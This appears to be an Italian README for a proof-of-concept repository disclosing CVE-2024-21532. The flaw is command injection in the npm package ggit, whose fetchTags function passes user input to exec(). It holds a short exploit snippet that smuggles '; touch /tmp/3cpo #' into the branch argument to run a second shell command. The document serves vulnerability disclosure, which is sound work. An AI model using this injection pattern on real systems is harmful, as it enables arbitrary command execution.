
Proof-of-concept exploit per CVE-2024-21532, una vulnerabilità di command injection nell'API fetchTags del pacchetto npm ggit, che dimostra l'uso non sicuro di exec().
ggit si descrive come:
Local promise-returning git command wrappers
Risorse:
Articolo di approfondimento su questa vulnerabilità: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability
Sto segnalando una vulnerabilità di Command Injection nel pacchetto npm ggit.
Questa vulnerabilità si manifesta con l'API fetchTags(branch) della libreria, che consente all'input dell'utente di specificare il ramo da recuperare e concatena quindi questa stringa a un comando git che viene poi passato alla non sicura API exec() dei processi figli di Node.js.
[email protected] o versioni precedenticonst fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
// should be same as running command
// git pull origin --tags
console.log("done");
});
/tmp/3cpoConsulta CONTRIBUTING per le linee guida su come contribuire a questo progetto.
Liran Tal